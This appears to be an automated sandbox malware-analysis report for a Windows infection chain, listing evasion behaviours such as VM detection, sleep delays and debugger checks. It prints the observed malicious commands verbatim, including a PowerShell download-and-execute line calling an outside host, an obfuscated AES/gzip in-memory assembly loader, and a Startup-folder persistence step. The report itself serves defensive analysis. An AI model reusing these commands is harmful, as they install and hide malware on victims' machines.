Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5303Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4589Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7845Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1801Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4249Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 497Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7930Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1594Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6927Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2380Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2175
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 5303 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 4589 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 7845 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 1801 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 4249 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep count: 497 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 7930 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep count: 1594 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep count: 5671 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep count: 199 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4820Thread sleep count: 6927 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep count: 2380 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep time: -19369081277395017s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep count: 2175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 285 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: powershell.exe, 00000003.00000002.1765941531.000001D0F5B44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\local\temp\c.bat';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function 